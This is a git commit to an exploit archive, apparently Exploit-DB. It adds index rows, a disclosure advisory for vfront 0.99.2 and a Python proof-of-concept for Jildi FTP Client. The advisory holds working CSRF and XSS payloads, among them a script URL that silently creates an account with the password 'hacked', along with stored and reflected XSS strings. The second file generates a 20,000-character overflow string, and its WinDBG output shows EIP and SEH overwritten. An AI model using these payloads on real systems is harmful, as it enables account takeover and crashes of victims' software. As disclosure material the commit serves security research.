DB: 2015-06-04

2 new exploits
2015-06-04 05:03:09 +00:00 · 2015-06-04 05:03:09 +00:00 · 0e74581282
commit 0e74581282
parent 222fb2102d
3 changed files with 193 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33375,6 +33375,7 @@ id,file,description,date,author,platform,type,port
 36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04  - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
+37186,platforms/php/webapps/37186.txt,"vfront-0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
 36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
@ -33563,3 +33564,4 @@ id,file,description,date,author,platform,type,port
 37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0
 37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
+37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21
--- a/platforms/php/webapps/37186.txt
+++ b/platforms/php/webapps/37186.txt
@ -0,0 +1,131 @@
+# Exploit Title:  CSRF & Persistent XSS
+# Google Dork: intitle: CSRF & Persistent XSS
+# Date: 2015-06-02
+# Exploit Author:  John Page (hyp3rlinx)
+# Website: hyp3rlinx.altervista.org/
+# Vendor Homepage: www.vfront.org
+# Software Link: www.vfront.org
+# Version: 0.99.2
+# Tested on: windows 7
+# Category: webapps
+
+
+Product:
+===================================================================================
+vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.
+
+
+
+Advisory Information:
+====================================
+CSRF, Persistent XSS & reflected XSS
+
+
+
+Vulnerability Detail(s):
+=======================
+
+
+CSRF:
+=========
+No CSRF token in place, therefore we can add arbitrary users to the system.
+
+
+Persistent XSS:
+================
+variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
+into the MySQL database which will be run each time variabili.php is accessed from victims browser.
+
+
+Persisted XSS stored in MySQL DB:
+=================================
+DB-----> vfront_vfront
+TABLE-----> variabili
+COLUMN------> valore (will contain our XSS)
+
+
+Exploit code(s):
+===============
+
+
+CSRF code add arbitrary users to system:
+=======================================
+http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%3dx@x.com%26passwd%3dhacked%26passwd1%3dhacked');</script>&tabella=&uid=&data_dal=All&data_al=All
+
+
+
+Persistent XSS:
+================
+http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
+Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
+"/><script>alert(666)</script>
+
+
+
+Reflected XSS(s):
+=================
+http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>
+
+
+
+XSS vulnerable input fields:
+============================
+http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
+altezza_iframe_tabella_gid   <------------- ( Persistent XSS )
+passo_avanzamento_veloce_gid
+n_record_tabella_gid
+search_limit_results_gid
+max_tempo_edit_gid
+home_redirect_gid
+formati_attach_gid
+default_group_ext_gid
+cron_days_min_gid
+
+  
+
+Disclosure Timeline:
+===================================
+
+
+Vendor Notification: May 31, 2015
+June 2, 2015 : Public Disclosure
+
+
+
+Severity Level:
+===================================
+High
+
+
+
+Description:
+==========================================================
+
+Request Method(s):
+                                [+]  GET & POST
+
+Vulnerable Product:
+                                [+]  vfront-0.99.2
+
+Vulnerable Parameter(s):
+                                [+] altezza_iframe_tabella_gid
+				    passo_avanzamento_veloce_gid
+				    n_record_tabella_gid
+				    search_limit_results_gid
+				    max_tempo_edit_gid
+				    home_redirect_gid
+				    formati_attach_gid
+				    default_group_ext_gid
+				    cron_days_min_gid
+				    id_campo
+				    op
+				   
+
+
+Affected Area(s):               [+]  Admin & MySQL DB
+
+===============================================================
+
+
+
+(hyp3rlinx)
--- a/platforms/windows/dos/37187.py
+++ b/platforms/windows/dos/37187.py
@ -0,0 +1,60 @@
+#!/usr/bin/python
+#Exploit Title:Jildi FTP Client Buffer Overflow Poc
+#Version:1.5.2 Build 1138
+#Homepage:http://de.download.cnet.com/Jildi-FTP-Client/3000-2160_4-10562942.html
+#Software Link:http://de.download.cnet.com/Jildi-FTP-Client/3001-2160_4-10562942.html?hasJs=n&hlndr=1&dlm=0
+#Tested on:Win7 32bit EN-Ultimate
+#Date found:     02.06.2015
+#Date published: 02.06.2015
+#Author:metacom
+
+'''
+===========
+Description:
+===========
+JilidFTP is a powerful ftp-client program for Windows, it fast and reliable
+and with lots of useful features. It supports multi-thread file upload or 
+download , so you can upload or download several files at the same time. 
+The job manager integrates with the Windows scheduler engine ,this provide
+you more freedom and flexibility to upload or download your files. 
+It can also traces changes within a local directory and apply these 
+changes to remote ftp server .The user-friendly interface lets your 
+software distribution, uploading files to a web-server, and providing
+archives for various purposes more easily.
+
+============
+How to Crash:
+============ 
+Copy the AAAA...string from Jildi_FTP.txt to clipboard, open Jildi Ftp and press Connect
+and paste it in the Option -- Name or Address --and press connect.
+
+===============================================
+Crash Analysis using WinDBG: Option --> Address
+===============================================
+(f6c.4fc): Access violation - code c0000005 (!!! second chance !!!)
+eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
+eip=41414141 esp=000311cc ebp=000311ec iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+41414141 ??  
+0:000> !exchain
+0012ef40: 41414141
+Invalid exception stack at 41414141
+
+============================================
+Crash Analysis using WinDBG: Option --> Name
+============================================
+(2ec.dac): Access violation - code c0000005 (!!! second chance !!!)
+eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
+eip=41414141 esp=000311cc ebp=000311ec iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+41414141 ??              ???
+0:000> !exchain
+0012ef40: 41414141
+Invalid exception stack at 41414141
+'''
+filename="Jildi_FTP.txt"
+junk1="\x41" * 20000
+buffer=junk1 
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()